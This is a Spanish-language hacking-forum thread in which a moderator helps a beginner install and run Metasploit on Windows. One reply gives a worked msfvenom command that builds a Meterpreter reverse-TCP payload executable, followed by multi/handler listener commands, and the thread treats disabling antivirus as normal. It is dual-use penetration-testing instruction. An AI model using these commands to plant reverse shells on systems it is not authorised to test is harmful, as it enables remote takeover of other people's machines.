[Metasploit Windows]

  • 16 Respuestas
  • 4582 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[Metasploit Windows]

  • en: Octubre 29, 2018, 08:32:02 pm
Buenas comunidad de Underc0de, he leido que ahora se usa mas el metasploid que los RAT. El usuario @You are not allowed to view links. Register or Login me ha pasado los links para poder conseguir el metasploit pero me surgio un problema. Tengo un windows 32 bits y en la pagina de descarga : You are not allowed to view links. Register or Login solo hay para 64 bits y no puedo utilizaro. ¿Hay alguna version para 32 bits? en ese caso porfavor decirme que version puedo utilizar y en donde puedo conseguirlo. Gracias comunidad.
« Última modificación: Octubre 30, 2018, 08:39:47 pm por Denisse »

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Octubre 29, 2018, 09:34:20 pm
Sobre lo que me dijiste por mensajes privados: Metasploit pro, ofrece mas utilidades como evacion de anti virus, ofrece una interfaz gráfica (GUI) y otras características que no dispone el metasploit convencional o comunity.

Sobre metasploit framework de 32 bits: Te recomiendo que descargues pentestbox (con metasploit), ya que ademas de metasploit trae multitud de herramientas para que pasas un buen rato O tambien puedes descargarlo desde la pagina de rapid7 (que practicamente es lo mismo que lo descargues desde el primer link que te indique), la diferencia es que aqui podras descargar de 32 bits (Aunque si no recuerdo mal, la pagina tenia o tiene un problema cuando seleccionas 32 bits se empezara a descargar la 64 bits). Cuestion de ir probando.

Recomendacion:

*- Descargues pentestbox aunque pese un poco mas, pero disfrutaras de metasploit framework y otra herramientas.
*- Como alternativa a todo esto es que descargues una distribucion de linux y instales metasploit, porque?, mas optimizado. En windows tarda en cargar 5min. para que aparesca el mitico mensaje de metasploit: "Starting metasploit console ...", para esperar unos 20 min a que cargue su logo, posteriormente esperar 5 min a que termine de verificar que no tenga ningun error.

Nota: Si lo usaras en Windows, por lo menos ten el win7 o superior ya que te puede generar errores si usas por ej: winxp

Actualmente yo lo tengo instalado en windows 8 64 bit y funciona pero muy lento a la hora de usar

Nota: Para descargar metasploit framework de 32 bit en la pagina de rapid7 tienes que rellenar un formulario con datos, pueden ser falsos pero recomiendo que algunos sean reales por lo menos.

Fuentes:

*- System requirements: You are not allowed to view links. Register or Login
*- Install metasploit framework in github: You are not allowed to view links. Register or Login
*- Pentestbox: You are not allowed to view links. Register or Login
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 29, 2018, 11:45:53 pm
Buenas tengo otra pregunta man ¿el pentestbox tiene un lenguaje distinto o siempre son iguales al otro metasploit? otra de las consultas era si el metasploit pro tiene alguna version gratuita.

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Octubre 30, 2018, 02:58:56 pm
@You are not allowed to view links. Register or Login

Citar
¿el pentestbox tiene un lenguaje distinto o siempre son iguales al otro metasploit?

No se a que referencia tratas de hacer con un lenguaje distinto. Si en tal caso te refieres al lenguaje de programación en que esta creado metasploit es ruby, sin embargo tiene algunas utilidades, exploits, etc de distintos lenguajes, Si te refieres si cambiara la funcionalidad si la uso en una distribucion u otra, No, sera por igual en la mayoría de cosas.

Citar
metasploit pro tiene alguna version gratuita.

Si no me equivoco la misma pagina de rapid7 hay una versión pro gratuita por un periodo de tiempo determinado.
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 06:15:18 pm
Me baje el metasploit y me lleno de virus desde la pagina oficial xD , el box tambien?

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 06:51:06 pm
Desactive el antivirus era algo obvio , tengo otra duda... ¿como ejecuto el metasploit? ando mirando clases de metasploit pero no se como ejecutarlo. No hay ningun acceso directo.

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 07:23:15 pm
@You are not allowed to view links. Register or Login

Claro que te va a detectar que es un virus ya que es un herramienta de explotación donde contiene multitud de cargas útiles, exploits, etc, hasta el anti virus con menos funciones lo detectaría. Esta bien que hayas desactivado el AV.

Para ejecutarlo en tal caso de que lo hayas hecho en windows, solo coloca en el buscador metasploit, click en "metasploit - console" y tendras que esperar un rato (de verdad cuando te digo un rato es que esperes algo de tiempo, por lo tanto tendras que ser paciente, aunque tambien depende de las características de tu dispositivo), se te abrira una ventana de comandos, al principio no te aparecera nada, a los cinco minutos aprox. te indicara "Starting de metasploit framework ..." (o algo parecido) y esperas a que cargue.

En linux (distribuciones), solo ejecuta el siguiente comando, una vez instalado: "msfconsole" y empezara a cargar.

Recomendaciones si lo usaras en windows:

*- Aprende a como usarlo antes de ejecutarlo: ya que si en tal caso esperas 1 hora aprox. a que cargue por lo menos no tendras que perder otro tiempo en aprender.
*- Si tu dispositivo no tiene caracteristicas notables o extrabagantes solo cierra las aplicaciones y programas que estes usando.
*- Para ejecutar las demas herramientas de metasploit solo debes dirigirte a la ruta de donde lo instalastes: ej: "c:\metasploit". msfconsole en windows es (console.bat) msfvenom es (msfvenom.bat), etc.

Recomendaciones en linux:

*- Aqui es mas sencillo, solo ejecuta esas herramientas en cualquier ruta y listo.
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 10:44:29 pm
Buenas me aparece esto , no me aparece ningun ejecutable en el buscador para iniciar Metasploit. Otra de las preguntas es.. ¿una vez iniciado tengo que abrir esos bats para entrar a consola desde el metasploit ya iniciado? gracias por tu paciencia.

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 10:54:46 pm
@You are not allowed to view links. Register or Login

Citar
¿una vez iniciado tengo que abrir esos bats para entrar a consola desde el metasploit ya iniciado?

No, lo que me refería con esos archivos de secuencia de comandos, es que hay herramientas que están como interconectadas con metasploit, agrego, para generar una carga útil de un formato ejecutable donde puedas obtener una sesión necesitas msfvenom (Una herramienta de metasploit para generar cargas útiles ejecutables, ej: generar un archivo malicioso para windows llamado: nomeejecutesquesoyunvirus.exe).

Citar
no me aparece ningún ejecutable en el buscador para iniciar Metasploit.

Deberia aparecerte. En tal caso de que no, solo ve a la ruta donde lo instalastes y ejecuta el archivo de secuencias de comandos console.bat.
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 10:59:09 pm
Ahi los encontre ¿que diferencia tiene venom y console? ando viendo un cuso de dragonJ. nose si me servira . Gracias por las respuestas

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 11:11:17 pm
@You are not allowed to view links. Register or Login

Citar
¿que diferencia tiene venom y console?

MetaSploit Framework Console (MSFConsole): Es la consola o mejor dicho, la suite de metasploit para controlar las pruebas de penetración.

MetaSploit Framework Venom (MSVenom): Como te mencione anteriormente en los comentarios, es una herramienta de metasploit que se encarga de generar cargas utiles (malware/virus que dispone a hacer una acción del atacante) en ejecutables de muchos formatos.

Citar
Sobre Los cursos

En mi opinión irrelevante para muchos, no es necesario que veas cursos/libros/etc de metasploit, ya que hay cantidades extravagantes de información en la web. Fácilmente usa tu buscador para encontrar una duda que tengas sobre metasploit o por lo menos busca los comandos basicos y veras que te hara mas simple el uso de este mismo.
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 11:38:38 pm
Gracias hermano , ando estudiando un curso para entender como funciona el metasploit. Si tienes algo para aportarme para aprender sobre metasploit se le agradeceria colega. Saludos !

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Octubre 31, 2018, 11:57:52 pm
Ando leyendo en un curso y hay comandos como : "Cat" o "pwd". Entre en internet y veo que son comandos para linux. ¿En windows va estos comandos tambien?

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Noviembre 01, 2018, 12:20:18 am
@You are not allowed to view links. Register or Login

Te dire algunos comandos basicos:

Consola de metasploit:

use <modulo> :: Es para seleccionar un modulo de metasploit y usarlo.
reload :: recarga los modulos en tal caso de que se haya agregado un modulo y la consola estuvo abierta
search <coincidencia del modulo o modulo> :: Busca una coincidencia de un modulo cargado de metasploit
set <parametro> :: ajusta un valor de un parametro
show <parametro> :: muestra alguna opcion como puede ser un payload, exploit, auxiliar, etc. EJ: show payloads
options :: lo mismo que que show options
run o exploit :: una vez ajustado todas las opciones, arrancas o inicias el exploit

MSFVenom:

-p <payload> :: selecciona una carga útil de la lista de payloads
-h, --help :: ver la ayuda
LHOST=<tu direccion ip/nombre del host/dns/etc> :: LHOST (Local HOST) Tu direccion para establecer una conexion entre metasploit y la carga util
LPORT=<tu puerto local> :: Establece el puerto donde recibiras la conexion
-f <formato de la carga útil> :: El formato de la carga util por ejemplo: raw. Generara una carga util dependiendo de la extension del archivo usando el parametro con -o, si en tal caso no se especifica una extension se usara el formato de un ejecutable de windows
-o <nombre del archivo a generar> :: Nombre de la carga util, si no se especifica el -f y colocas el nombre por ejemplo: .exe, .ps1 se creara con ese formato. En tal caso de que sea lo contrario y especificas -f por ejemplo: -f exe y colocas en el parametro -o .ps1, .txt, etc, se creara con esa extension pero con el formato exe (un ejecutable de windows)

Aqui una lista de payloads disponibles (OJO: no se si esta actualizada), con el mismo msfvenom puedes ver la lista (Pero no recuerdo el parametro :/): You are not allowed to view links. Register or Login

Un ejemplo de comandos que se usuarian en una prueba de penetracion:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4445 -f raw -o payload.exe
msfconsole
use exploit/multi/handler
set lhost 192.168.2.2
set lport 4445
set payload windows/meterpreter/reverse_tcp
exploit

Si deseas hablar mas sobre el tema, escribeme en privado (con gusto respondere dependiendo de mis conocimientos) ya que este tema esta solucionado.
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 678
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email

Re:[Metasploit Windows]

  • en: Noviembre 01, 2018, 12:23:38 am
You are not allowed to view links. Register or Login
Ando leyendo en un curso y hay comandos como : "Cat" o "pwd". Entre en internet y veo que son comandos para linux. ¿En windows va estos comandos tambien?

En windows, son parecidos en las funciones (En la mayoria de casos), cat es equivalente a type en windows (Su función es ver el contenido de un archivo), pwd es equivalente a cd en windows (Su función es ver la ruta actual)
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado pacosomaloso

  • *
  • Underc0der
  • Mensajes: 32
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Noviembre 01, 2018, 03:06:18 am
Dale men ahi te mande dos mensajes privados. Saludos.

Desconectado m3tr4l14

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil

Re:[Metasploit Windows]

  • en: Diciembre 21, 2018, 07:06:59 am
Hola, Metasploit podría correr en LUBUNTU?  Netbook 1g ram

 

[SOLUCIONADO] Duda con Windows 7 de 32 bits & 64 bits

Iniciado por andrestoushit

Respuestas: 2
Vistas: 2783
Último mensaje Marzo 15, 2016, 04:01:16 pm
por karurosu
[SOLUCIONADO] [Python] No puedo agregar python al path de windows

Iniciado por natalioruis

Respuestas: 3
Vistas: 3197
Último mensaje Noviembre 05, 2015, 04:55:52 pm
por Gabriela
[Consulta] Maquina Virtual para Windows 7 para correr Beini 1.2.2

Iniciado por jetlivefree

Respuestas: 4
Vistas: 8163
Último mensaje Octubre 23, 2011, 07:36:25 pm
por 4jtz4k
RunPE y windows 10 "No se puede ejecutar esta aplicación en el equipo"

Iniciado por proxy_lainux

Respuestas: 1
Vistas: 2788
Último mensaje Agosto 28, 2016, 07:47:46 pm
por grep
[SOLUCIONADO] Sacar kali linux y instalar windows 7 como sistema único

Iniciado por KFZ_10

Respuestas: 7
Vistas: 4103
Último mensaje Agosto 24, 2017, 09:28:19 pm
por Psymera